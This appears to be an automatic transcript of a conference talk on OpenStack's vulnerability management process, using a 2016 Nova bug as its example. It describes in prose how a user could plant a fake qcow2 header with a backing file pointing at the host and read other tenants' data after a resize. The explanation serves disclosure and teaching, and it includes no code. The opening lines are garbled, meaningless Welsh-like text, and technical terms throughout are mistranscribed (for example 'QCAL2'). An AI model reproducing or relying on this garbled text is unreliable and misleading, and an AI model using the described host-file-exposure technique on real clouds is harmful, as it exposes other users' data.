 Yn gyfan, wrth adored yn cyfnodd, mae'n ffais edrych o ran amwINE I'm in the Nova team at Red Hat, and Red Hat has an upstream first policy, and Tristan is in the Upstream security team and, it's the first time we've worked together on a few security bugs ago, but the first time we worked together Felly y ferson wedi bod gyda'r bobl, nid eich bod dri ni wedi gweithio cydyntgaid ar gyfer y rhwng. Diolch yn ddiddordebau byddwn yn metodol. Rwy'n fail o'r schyffr hwn. Byddwn yn ysgrif iawn o'r llwyffaeth, mae'n golygu i'r hollol i'r hollol. Rwy'n credu hollol o'r hollol, ond y llwyffaeth yn hollol i'r hollol i'r hollol i'r hollol i'r hollol. Mynd y hollol â'r hollol i'r hollol, rydyn ni'n golygu'n gwahanol sy'n mynd i chi'n gwahanol. If you would like a full copy of the presentation, then by all means email myself or Tristan at the end will send you a copy. The other thing is at other conferences I've been to there has been somewhere to upload slides to. Does anybody happen to know where we're supposed to upload slides to? No. OK. Well, as soon as I get a nagging email that would be fantastic. As soon as I find out where it is I will upload the slides there. But I couldn't find it when I was looking at it before. The other thing is the detail of this talk is really in a couple of external URLs which we will give clearly on the board. So you can go look at those. The first one is this one which is nice and phone friendly for you. This talk is about the vulnerability management team process which we're going to call the VMT process for short. As I was saying before everything in this talk could really be inferred from the documentation. Go to that website. It documents the whole process really well. All we're really going to do is talk through a specific instance where we followed this process with a specific security bug. In doing that we hope to add a practical flavour to what is by design a very nice boring reliable process. We'd like to introduce you to some roles and responsibilities that you're going to encounter whilst going through that process and maybe introduce some design decisions that were involved in constructing the VMT process. So this presentation will talk about vulnerabilities. Vulnerability is a weakness which allows an attacker to reduce a system information assurance. It's commonly referred to as a security bug or a CVE bug and indeed it's a special type of bug that needs extra attention because of its potential negative impact. Vulnerability management, it's about assessing the impact and severity of a bug report. It's about designing security patch following a process and respect the role of lesser disclosure. Lesser disclosure, it's about disclosing the vulnerability details to an increasing number of people over time but only to the people required to reach the next step. So we're going to be using this diagram throughout the talk and this is the VMT process and you'll find the original version of this diagram on the link I gave you earlier and this is exactly the same diagram just reformatted slightly. But to summarise, way at the top somebody reports a bug and then we've got two streams. Over on the right we've got what an engineer does. So an engineer works on a fix. Over on the left we've got what the VMT does. The VMT ensures everything is properly documented and coordinates with all relevant parties. And then we get to embargo disclosure. So at embargo disclosure we provide the fix early to certain critical users. And then we get to public disclosure where we open the bug to everybody and the fixes are released. So why do we follow this process? Now you are very obviously not legally obliged to follow this process. The process is designed to serve the community. So we've got a couple of interests here. The disclosure of unpatched vulnerabilities is not in the community's best interests. But at the same time it's not in the best interests of the community to keep known vulnerabilities secret for a long time because they tend to leak. So the process is designed to enable you to disclose your vulnerability as quickly as is responsibly possible. And the reason we follow it is because we're good citizens. There's no stick. The process is designed to help you make those responsible disclosure decisions. And Tristan earlier referred to lesser disclosure. The first step in that disclosure was when you reported the bug to the VMT. And after that the VMT will guide you through further disclosures until the bug is released. For this talk I will be talking about everything done by the vulnerability management team or VMT. And Matt will be talking about everything that is done by Red Hat Engineering. But you should know that it's not a two-man show and we are going to talk on behalf of many other users, part of those. So step one, discovering the bug. So the bug was originally reported by me on the 22nd of February 2016. And it was just from code inspection. So I was working on something else and I noticed something that didn't quite look right. And I decided to look into it a little bit closer. And specifically I noticed that NOVA would do format inspection on a disc if a certain metadata file was missing. And I also knew that there was a way that a user could engineer that metadata file to be missing. Specifically by doing a resize operation and a couple of other ways. So for anybody who's not familiar with it, a format inspection. So KVM, which is the hypervisor which is most used by NOVA's Libvert driver. And I think the most used hypervisor in OpenStack. It can store data on disc in a number of different formats. But NOVA uses raw and QCAL2. A raw file is exactly what it sounds like. So if we're storing information on the file system what we've got is a file. It contains the exact bits that a user wrote to their virtual disc. If we're using QCAL2 then QCAL2 has some additional features. And those additional features are described by a header which goes at the start of the file. And one of the additional features QCAL2 provides is backing files. And backing files allow that QCAL2 to say this disc refers to this other file on the host compute. And NOVA uses them for base images. So when we've got a glance image and we're using that as a template for a number of different guests then we've got a base image over here and then we've got a QCAL2 which says this disc is everything that's in that template over there plus some changes. And they're really useful. Now NOVA file system storage uses QCAL2 by default but you can also configure it to use raw. Now remember that a raw file is whatever the user wrote to their disc. So the user, if you're using raw on a file system, can control completely what's in that file. And that's okay as long as we know it's raw. But if we can force it to do format inspection then the user has an opportunity to do something underhand. If the user writes to their raw backed file a fake QCAL2 header and then engineers it so that we're going to have to inspect that to work out what's in that file then when we inspect it, if the user has written a fake QCAL2 header then we're going to inspect it and we're going to think it's QCAL2. And if the malicious user writes a fake QCAL2 header that says this disc refers to this other file on the host then when they start their instance up they're not going to see their own data. They're going to see that other file on the host. And even worse than that if they say this other file on the host is the compute's root disc then we can see everything on the compute host including the data of other users and other tenants. So with that in mind the bug I thought I saw was that a user could create an instance within a femoral disc and they could write a fake QCAL2 header to that disc and say this disc refers to this other file which I'm guessing is present on the host. And then they do a resize operation which causes that metadata file to get deleted or to get missing. And then they restart and then they can see whatever was on the host. And when I initially saw that I actually thought it would be mitigated by SE Linux but I will touch on a little bit later it turned out I was wrong and it is not. And more generally we're looking into that. So I think I found a bug what do I do? Now as you probably know bugs in Nova are quite exceptionally rare so the chances are that nobody in the room has ever encountered the NovaBug reporting system but if you had then you would know that we use Launchpad and security bugs go in exactly the same place. So we go to the security bug reporting processes exactly the same as reporting any other bug right up to the last step. So we go to Launchpad, we add a summary, we add some further information and then we scroll down to the bottom of that long blurb. Has anybody ever read that? Not me. And we see the bit at the bottom that says this contains information that is public with a little pencil next to it. And if we expand that then we can see this is where our visibility options are and the one we want to choose is private security. And if we do that then it gives us a nice reassuring bar at the top which tells us that when we click submit we're not going to be making it public. And when you do that as a member of the vulnerability management team I am notified of a new bug report against OpenStack project. And the first task for the VMT will be to confirm whenever the report described a vulnerability or not. To do that I subscribe the project liaison, in this case it will be the Nova Corsac and we engage the discussion to check if it's considered as a vulnerability. Because most of the time new bug reports turns out to be banning. So it's better to be safe than sorry. The VMT is using a taxonomy to rank bug reports. Only the bug that can be fixed in the master version and all stable release will be handled by the VMT. We call them class A. Class B will indicate the bug that can't be fully fixed such as one affecting a poor architecture or bad designs. Those are handled by a security note instead of an advisory. Class C report indicates one that are not really practical. For example, when it depends on guessing a random value such as a UID then we don't consider it as a practical vulnerability and it does not deserve an advisory. And of course we have extra classes for bugs only affecting the development branch like that have not been released yet. Security hardening opportunities when the default settings are not bad but not great either. And regular bug that sometimes got reported as a security bug for some reason. In this case, Matthew clearly described the bug in the report and thus it was easy to confirm. At that point, the VMT coordinator will start writing an impact description that will be communicated to downstream stakeholders and it will also serve as a basis for the upcoming advisory. So it's important to get it at the very beginning. The purpose is to describe the impact from a stakeholder point of view. Indeed, technical quirks from the report does not necessarily matter and it needs to be converted into formats that articulate. Who is the actor, for example is it a remote or is it an authenticated user? Who is the action triggering the bug? What is the impact and what are the consequences? And finally, which deployments are actually affected and does it need special options or something non-default? Lastly, the impact description will also include reporter credits as well as the affected version that needs to be narrowed down. So, to answer Tristan's questions, the bug in this case can be exploited by a remote authenticated user. The bug is triggered when the user does a resize operation. The impact is read-only access to all storage connected to the compute host including the data of other users. And it only affects deployments which use raw file system storage which fortunately is not the default. But to help answer these questions with certainty, I didn't do that myself. I pulled in some colleagues for additional input and a reproducer. And this presents as an immediate problem because we do all of our disclosure management through Launchpad, through the bug, to centralise it. And by default, the bug is visible only to me and to the VMT. So, I can point my colleagues to it but they can't see it. So, as the bug reporter, I can open it to whoever I want, which is what I did. So, here's the bug and this is Launchpad and to open it up to a new person, if you have a look in very small up at the top right, you'll see other bug subscribers and a link saying, subscribe someone else. That is the bit you're looking for. So, you click subscribe somebody else and that person is added. So, in the first instance, I added my colleague Dan Berenge who looked at the bug and he pointed out that SC Linux was not going to be the defence that I thought it was going to be, which was confirmed by my colleague Lee Yarwood who actually set up the issue, set up a system to reproduce it properly and confirmed that we could actually exploit the host in the way described. But note that at this point in the process, I still haven't opened up the bug to many people or in fact even my own team. So, with a better understanding of the severity of the bug prompted by Tristan's questions, Lee then started working on it immediately because we realised it was quite severe. This presents us with some practical problems though because we can't use public infrastructure as that would disclose the bug. So, specifically, we can't use upstream Garrett and we can't use upstream CI. And the same goes for the unpacked description. After having produced a draft and having it validated by Matthew, we also go only on the launchpad where all the information I gathered at a single point of coordination. And another VMT coordinator will review and double check the details to make sure it's accurate and there is no grammar error and stuff like that. Then comes the review process. Now, I said we can't use Garrett, but we still have to go through a review process, but obviously it's slightly complicated. So, what we do instead is we still develop patches, but instead of posting to Garrett, we format them as Diff files and post them to the launchpad. And then we get other people who are also subscribed to the bug to review them on there. Something else we need to think about at this stage is that when the bug eventually does become public, when it eventually is going to go to Garrett, it is still going to have to go through the same review process that every other patch to Nova goes through. But because of the severity of the impact of the bug, we want it to clear that hurdle very quickly. So, a good idea is at this stage to get a core reviewer on board to give it a provisional plus two. So, what I did was I added Dan Smith to the bug and he reviewed it. And we had a little bit of back and forth on that with Dan. And when he said he was provisionally happy, we decided we were good to go. Well, it's actually not a good thing to do. It's mandatory for the VMT to have approval on the launchpad bug report because otherwise there is no guarantee it will get a merge once public. To ensure the full traceability, we have a severe number assigned before the issue is communicated to a larger public. So, we use the common vulnerability and exposure, in short, CVE number, which is a system that provides a reference-based method for non-vulnerability. And once the patch and the impact description are approved, the VMT coordinator will request a CVA number to something called a CNA. It's the CVA number authority. For public issue, we request the Mitre Corporation because they handle all the public vulnerabilities. And for private issue, we are going to request them from the Red Hat CNA, which is the historical one that does Linux vulnerabilities number assignment. So, once we receive the number, it gets attached to the bug report. So that, again, it's the single point of coordination for open stack issues. And we now have everything to move on to the next step. So, when the issue is still private, we may do an embargo disclosure. Otherwise, we jump directly to publishing the advisory at that point. In the spirit of a responsible disclosure, the ecosystem collectively known as downstream stakeholders needs to be warned in advance so that they can roll out patch in a coordinated fashion on disclosure day. The first step is then to propose a disclosure day. We use a very short embargo period, which is from three to five days, excluding Mondays and Friday. So it can be very short. So, as the bug reporter, the BMT actually asked me when I want to disclose, because it's my bug, but they will help me pick. As I said before, we've got these competing desires in the process. So we want to disclose as quickly as possible to minimise the risk of leaks whilst giving ourselves enough time to complete the process. So, on this occasion, I took advice from both the BMT and Red Hat's internal security team. And this time, it was fairly simple to pick a date. It was, as soon as we were done, plus a couple of days. However, it's not always quite that simple. So, for example, there was a previous CVE that we worked on at the end of last year. And the initial disclosure date that I proposed, I think it was the 22nd of December, and that I proposed this and the BMT gave me a problem and said, perhaps that might not be terribly nice to a bunch of cis admins. So maybe you could move that by a couple of weeks. So we moved that to just after the new year. But it was still my call. Once this is agreed upon, I'm in charge of sending the pre-OSSA, which is the Advanced Notification Document, which includes basically the impact description, the CV number, the pre-approved patch, and the disclosure date, so that everyone is on board with the same bits of information. So, as Red Hat is an open stack distributor, we have customers that are running this stuff in production. We are actually one of the people on that embargo disclosure list. We're aimed to have a fix ready for our customers, along with everybody else who's in a similar situation, ready to go when the bug becomes public. And we firewall ourselves internally on this. So the Red Hat, we disclose to ourselves internally at exactly the same time as we disclose to everybody else. So our internal infrastructure team, even though on this occasion the bug came from inside Red Hat, we didn't have a head start on anybody else. So on this embargo disclosure date, we're then good to go to start the process of getting this out to our customers. So when Lee originally developed the patch, he developed it against upstream, and then he backported it to the supported upstream stable branches. And then he further backported the patch to all supported Red Hat releases. At this embargo disclosure date, he can then push those backported patches into our downstream gerrit, which allows us to review them formally within the team, and then push them out to our build infrastructure and into our own CI. And once we've done that, once we've got builds ready, once we've cu-aid them, we then need to prepare an internal aratham. We need to package this stuff up so we can give it out to our customers. And we have to do all of this in a three to five day window. So as soon as we push go on the embargo disclosure, Red Hat release engineering is very, very busy, as I expect are a number of other release engineering teams. On this disclosure date, I open the bug report and coordinate with a Nova developer to submit the patch to Gerrit, just in case the patch does not apply because the master may have changed during the embargo period. We also be very worried of test result by the upstream CI system because if the gate is failing and the patch needs alteration because there was a regression on the test side effect, we have to quickly contact the stakeholders to tell them that the patch needs to be modified. And if this happens after the patch has been merged and the advisories send out, we also need to take care about the fact it's missing something or it needs to be changed. So we call this anerata. So at this point, Lee pushed the fix to upstream master and to the supported stable branches. And we started the regular review process. And in this case, it turns out that we had actually introduced a regression, which was unfortunate, as it wasn't caught in review. So we very quickly developed a fix for that and we pushed that out in a day or so, I think. It was expedited. And as Tristan mentioned, he then had to go back to the OSSA and update it with aneratum to say and there was an additional fix. So once the patch looks good on the gate system and that core developer have approved or at least test our succeeding, we proceed to produce the final advisory document. One should know that we are using also code review to validate the document with peer review. And it's based on the Yamel description of all the details that we have been presenting so far. And plus the bug report URL and the patch number that we didn't have until we opened the bug. So when this review is approved, the website security.openstack.org get updated with the latest information. And it also under a nice restructure text output that we can send to a couple of mailing lists such as the open-stack, open-source security mailing list as well as the open-stack annul. So that when it's public, it's really public. So the timeline of this bug. It was originally reported by me on the 22nd of February 2016. And we released the fix on the 9th of March 2016. So that was pretty quick. And we did this during the metaca cycle. We also backported it to upstream, Kilo and Liberty, which were the supported upstream stable branches at the time. Which is a key point, by the way, because there are no branches, there are no other stable branches to backport to. So is anybody in the room still running Juno? No? Good. Because if you were, then that would still be vulnerable. But distributors obviously, including Red Hat, we support much older releases than that. So we backported this to OSP5, certainly and possibly even OSP4, I can't remember. But that would be at least Ice House. So, yeah. If you're running upstream stable, it is important to stay on top of patches. Otherwise, you're going to be vulnerable to these things. And at this point, the bug is now open. So we gave the URL earlier. You can go and have a look at that. And you can read all the comments, including everything that was embargoed at the time. You can see the patch review process and everything. And at this point, you are, of course, also expected to create a logo for your security vulnerability and to publish it on a website and to create a GitHub repo where you can share things about it. Here are a couple of other examples that illustrates the VMT process pretty well. The first one was involved a tricky 10 steps exploitation process that got a long time to figure out and a lot of iteration to fix properly. And the second one was a critical network bug that was handled swiftly across old stable branch. I think about two weeks it was set. So that was a great example. However, things does not work out that well all the time. In particular, the process may fail when, for example, a stakeholder does not understand the embargo list and push the patch to get it before the disclosure day or when the bug report simply gets open by accident. So the short version of that talk about what happens when there is a security issue summarised like, so we need to create a bug and check the private security option if it's relevant. Then the VMT will add an advisory task to the bug. So if it's not vulnerable, it's fine. The task will be closed and we move on. And otherwise the real process starts. So there is a discussion and patch development that happens on the bug report. There will be a CV number assigned. A stakeholder will be notified in advance. The report is then disclosed and the issue is fixed as well as the OSA is published. And I think that's it. Do you have questions? Can I ask you to grab the microphone? Thank you. They're recording. They won't be able to hear you if you don't use the microphone. Yeah, so just a quick comment on that actually. The CV number triggers a one-clock kind of running as well because as soon as it's assigned, that information that which project it's assigned to gets public, even the details don't. So from Mitra, you can go now and look at CVEs that has been assigned but has not been... The information has not been released yet. So that's something like if you are a Novagmin, for example, it's a good idea to scan through and basically add those CVEs on your follow list. So when the information becomes public, you get that information right away. That depends because first of all, the process is changing actually and Mitra is providing ways to request CVN number privately because it used to be through a mailing list. So indeed it was public and that's why the open stack is relying on another CNA for private issues and turns out as much as for embargo bug, Red Hat Engineer won't use the Red Hat internal system. The security team that assigns number for external project will do the same. Like Nova developer won't be aware of a CV request until we go down to the embargo disclosure. So requesting a CV does not necessarily expose that much of a new vulnerability if that was the question. No, it tells that... I can repeat it. It tells that there is a CVE requested for Nova. I'm not so sure about that. I think the registry are not necessarily public. Is there a CNA? It's a register of it. You don't know what have been registered. I thought it was the opposite actually. The Mit website used to not update their web page as soon as the disclosure happened. So you wouldn't even know the affected project. Go ahead. So I'll just follow up on the CVE stuff. I can guarantee you now there is at least one vulnerability in every single open stack service that exists today, whether or not there's a waiting CVE for it. So I don't think it really creates a problem with exposure. My actual question is slightly different. So what happens when you have a vulnerability reported and you acknowledge that it is a security defect, but let's say it's a design issue or something like that, something you can't easily change or backport? So, well, again, the VMT will only take care of class A type of bug. So when it's not something we can fix, we won't request ourselves a CVE. However, for those kind of bugs, we suggest a security note that will be written then by the security project. And one should know that anyone can actually request a CVE. It's not something we have a privilege of. It's just that we happen to do it for coordination purposes. I guess in that case we'd be looking to make sure everybody knows what the vulnerability is and can at least know that they're vulnerable to it and mitigate it if possible. Go ahead. So given the size of the project, have you tried to become yourself a CNE? That I've been in discussion, actually, it's not that worthy because we don't issue that many advisory in the end. What is your opinion of embargo? Is it something useful? Is it something good? Do you want to just get rid of embargo and just publish everything to get more people reviewing the patch and maybe get more attention on vulnerability and security? So from a practical engineering point of view as a redhatter with customers, I do actually appreciate the three-day window to try and get a fix in the hands of people who are running this who might be vulnerable at the same time that it becomes public. It's a tough one. It's probably a philosophical question, but I think it probably does the most good to the most users to get that out there. Red Hat is not the only entity that gets this information early. Public Clouds would also be on that list. All the distributors, so anybody who can justify themselves as being a source of real fixes for real users in the wild is going to be on that list. Pragmatically, I think embargo is a good thing, but we need to keep it short. What matters is really the period. Okay, thank you. More than a month, it goes more harm than benefits. You're going to have to be quicker because we've just gone over time. Okay, so in this particular case, the actual discovery was driven by developers' curiosity and diligence and so on. So I'm wondering, do we ever see cases where these exploits are actually used in the wild? Is that a thing in open stack? To our knowledge. Only as a vulnerability management team member, we only discuss about bug reports and there is no case in the wild exploitation. I guess that would be more of a question for ops. Does anybody ever see their cloud being exploited? Really? Cool. We should go check that out. At that point, I think we're going to have to wrap up. If you'd like to contact myself or Tristan, details are there. The helpful gentleman over there said that I'll get an e-mail to upload the slides somewhere at some point, which I will do. If that doesn't happen, as I say, feel free to e-mail myself and Tristan and we'll send you a copy of the presentation that has all the speakers' notes in it. Thank you very much.